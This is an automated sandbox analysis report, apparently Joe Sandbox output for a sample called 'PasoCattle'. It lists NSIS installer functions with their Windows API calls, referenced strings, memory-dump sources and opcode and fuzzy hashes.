Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

N, xrefs: 00404C32
M, xrefs: 00404B6F
@, xrefs: 00404BBC
, xrefs: 00404F65

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

ptF, xrefs: 00406D1A
Delete: DeleteFile("%s"), xrefs: 00406DE8
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
Delete: DeleteFile failed("%s"), xrefs: 00406E29
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
\*.*, xrefs: 00406D2F
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

A, xrefs: 00404662
F, xrefs: 004046A0

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

%s: failed opening file "%s", xrefs: 00406F38
name, xrefs: 00406FEB
GetTTFNameString, xrefs: 00406F33

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406A73

Strings

F, xrefs: 00406858
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
F, xrefs: 00406A7F

Memory Dump Source

